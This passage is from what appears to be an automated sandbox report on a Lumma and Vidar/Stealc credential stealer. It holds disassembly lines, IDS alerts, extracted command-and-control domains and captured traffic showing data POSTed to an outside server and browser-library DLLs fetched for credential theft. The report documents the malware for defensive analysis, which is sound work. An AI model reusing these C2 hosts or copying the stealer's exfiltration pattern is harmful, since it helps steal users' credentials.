                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al10_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]10_2_0041D672
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh10_2_00447630
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh10_2_0042C6E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042C6E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax10_2_0040A680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax10_2_0040A680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]10_2_004416A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000D0h]10_2_0041D733
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]10_2_00416866
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+68h]10_2_00447820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]10_2_0042B830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor eax, eax10_2_0042B830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax10_2_0042A8A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-000000C0h]10_2_0040F917
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]10_2_00412920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]10_2_00412920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00412920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [00451A70h]10_2_0042E927
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_0043B9F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]10_2_0042DA0A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh10_2_00449A10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h10_2_0042DB4B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]10_2_00404B50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h10_2_00443B60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [0045042Ch]10_2_0041FB73
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_00446BE5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx10_2_00448BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433BFE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433BFE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh10_2_00449BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]10_2_0041FBB1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h10_2_00420C4C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]10_2_00446C5A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]10_2_00405C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]10_2_0040FC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h10_2_00444C90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h10_2_00427D03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h10_2_00449D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh10_2_00449D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp eax, C0000004h10_2_0041DDFF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_00443DA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0042EE40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax10_2_00415E11
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]10_2_00406E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [edx+ebp]10_2_00406E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx10_2_00448F50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]10_2_0040DFC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]10_2_0040DFC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h10_2_00426FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433F92
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00433F92

                          Networking

                          Source: Network trafficSuricata IDS: 2056401 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mysterisop .site in TLS SNI) : 192.168.2.6:49754 -> 104.21.21.3:443
                          Source: Network trafficSuricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.6:53042 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056395 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (absorptioniw .site in TLS SNI) : 192.168.2.6:49755 -> 104.21.17.174:443
                          Source: Network trafficSuricata IDS: 2056409 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (soldiefieop .site in TLS SNI) : 192.168.2.6:49748 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.6:59023 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.6:51096 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.6:53950 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056403 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionsmw .store in TLS SNI) : 192.168.2.6:49747 -> 172.67.208.141:443
                          Source: Network trafficSuricata IDS: 2056393 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (abnomalrkmu .site in TLS SNI) : 192.168.2.6:49750 -> 172.67.152.190:443
                          Source: Network trafficSuricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.6:65507 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.6:65226 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:49751 -> 45.132.206.251:80
                          Source: Network trafficSuricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.6:58118 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056407 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (snarlypagowo .site in TLS SNI) : 192.168.2.6:49753 -> 104.21.18.193:443
                          Source: Network trafficSuricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.6:59978 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2056411 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (treatynreit .site in TLS SNI) : 192.168.2.6:49752 -> 104.21.84.18:443
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49724 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:49724
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:49725
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49754 -> 104.21.21.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 104.21.21.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49747 -> 172.67.208.141:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49747 -> 172.67.208.141:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49757 -> 104.21.16.12:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49757 -> 104.21.16.12:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49750 -> 172.67.152.190:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49750 -> 172.67.152.190:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49748 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49748 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49753 -> 104.21.18.193:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49752 -> 104.21.84.18:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49752 -> 104.21.84.18:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49753 -> 104.21.18.193:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49755 -> 104.21.17.174:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49755 -> 104.21.17.174:443
                          Source: Malware configuration extractorURLs: soldiefieop.site
                          Source: Malware configuration extractorURLs: chorusarorp.site
                          Source: Malware configuration extractorURLs: abnomalrkmu.site
                          Source: Malware configuration extractorURLs: mysterisop.site
                          Source: Malware configuration extractorURLs: snarlypagowo.site
                          Source: Malware configuration extractorURLs: questionsmw.stor
                          Source: Malware configuration extractorURLs: absorptioniw.site
                          Source: Malware configuration extractorURLs: treatynreit.site
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Thu, 03 Oct 2024 07:16:43 GMT Content-Type: application/octet-stream Content-Length: 391072 Last-Modified: Thu, 03 Oct 2024 03:47:30 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fe13d2-5f7a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes
                          Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                          Source: Joe Sandbox View IP Address: 49.12.197.9
                          Source: Joe Sandbox View IP Address: 104.21.84.18
                          Source: Joe Sandbox View IP Address: 104.21.18.193
                          Source: Joe Sandbox View ASN Name: HETZNER-ASDE
                          Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                          Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                          Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                          Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49726 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49721 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49727 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49722 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49724 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49725 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49723 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49729 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49730 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49731 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49732 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49733 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49735 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49736 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49738 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49740 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49742 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49744 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49743 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49739 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49745 -> 147.45.44.104:80
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49749 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49737 -> 49.12.197.9:443
                          Source: Network traffic; Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49746 -> 49.12.197.9:443
                          Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 5669 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 1025 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 98121 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: questionsmw.store
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soldiefieop.site
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abnomalrkmu.site
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: treatynreit.site
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: snarlypagowo.site
